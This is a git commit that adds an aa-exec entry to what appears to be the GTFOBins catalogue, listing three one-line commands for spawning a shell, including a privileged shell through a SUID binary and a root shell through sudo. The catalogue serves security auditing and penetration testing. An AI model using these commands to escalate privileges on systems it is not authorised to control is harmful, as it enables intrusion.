Add aa-exec

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
n0tr00t 2023-03-20 17:11:34 +00:00 committed by GitHub
parent 15f69868f6
commit a59b182003
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions

9
_gtfobins/aa-exec Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: aa-exec /bin/sh
suid:
- code: ./aa-exec /bin/sh -p
sudo:
- code: sudo aa-exec /bin/sh
---